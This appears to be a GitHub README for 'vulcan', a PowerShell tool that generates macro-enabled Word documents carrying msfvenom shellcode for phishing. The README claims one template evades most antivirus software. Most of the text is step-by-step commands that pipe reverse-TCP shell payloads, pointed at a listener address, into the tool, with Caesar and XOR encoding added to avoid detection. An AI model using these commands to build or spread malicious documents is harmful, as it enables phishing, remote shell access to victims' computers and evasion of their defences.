A PowerShell script that simplifies life and therefore... phishing.
BSD-3-CLAUSE License
PowerShell
script that simplifies life and therefore... phishing.A PowerShell
script to automate the creation of consitent and efficient macro-enabled Word
documents. At the time of writing, the indirect
template yields great results at evading most AVs, including Windows Defender
in some cases.
This PowerShell
script can be viewed as kind of a third-party add-on to MSFVenom - made possible thanks to Windows Subsystem for Linux - that leverage templates to quickly and easily - encoded - create Word
implants.
Users/stargazers are greatly encouraged toward contributing to improving and extending this project.
.\assets\decoders
) -> do not hesitate to submit new templates.Visual Basic
templating (.\assets\templates
) -> do not hesitate to submit new templates.Visual Basic
line-continuation limitations using -Treshold
.Clone this repository:
git clone https://github.com/aress31/vulcan
cd vulcan
Load the PowerShell
scripts:
Import-Module -Name .\Vulcan.psm1
(Optional) List available commands:
Get-Module -Name vulcan | select -ExpandProperty ExportedFunctions
Run vulcan
:
wsl --exec msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
Although obvious,
windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread
is a placeholder in the above example...
Get-Help -Name Invoke-Vulcan
is your friend... Your best friend is Get-Help -Name Invoke-Vulcan -Detailed
. Nonetheless, Invoke-Vulcan
must be fed a hex
-formatted shellcode. This can be achieved with:
Get-Content -Path $ShellCode | Invoke-Vulcan ...
wsl --exec msfvenom ... -f hex | Invoke-Vulcan ...
Embed a plain
shellcode:
wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
Embed a Caesar
-encoded shellcode:
wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-Caesar -Key 5 | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder Caesar -DecoderPath ".\assets\decoders\caesar.vba" -Key 5 -Verbose
Embed a XOR
-encoded shellcode:
wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-XOR -Key "StarWatchThisRepo" | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder XOR -DecoderPath ".\assets\decoders\xor.vba" -Key "StarWatchThisRepo" -Verbose
[!WARNING] The length of the key must be shorted than the shellcode.
Although obvious,
windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread
is a placeholder in the above examples...
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee /lamborghini ) - as a lot of my personal time went into creating this project.
It is easy, all you got to do is press the Sponsor
button at the top of this page or alternatively click this link.
Found a bug ? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project?
Please submit all PRs
on the GitHub pull requests tracker.
Give to Caesar (no pun intended ) what belongs to Caesar:
vulcan
is distributed under the terms of the BSD 3
.
See LICENSE for details.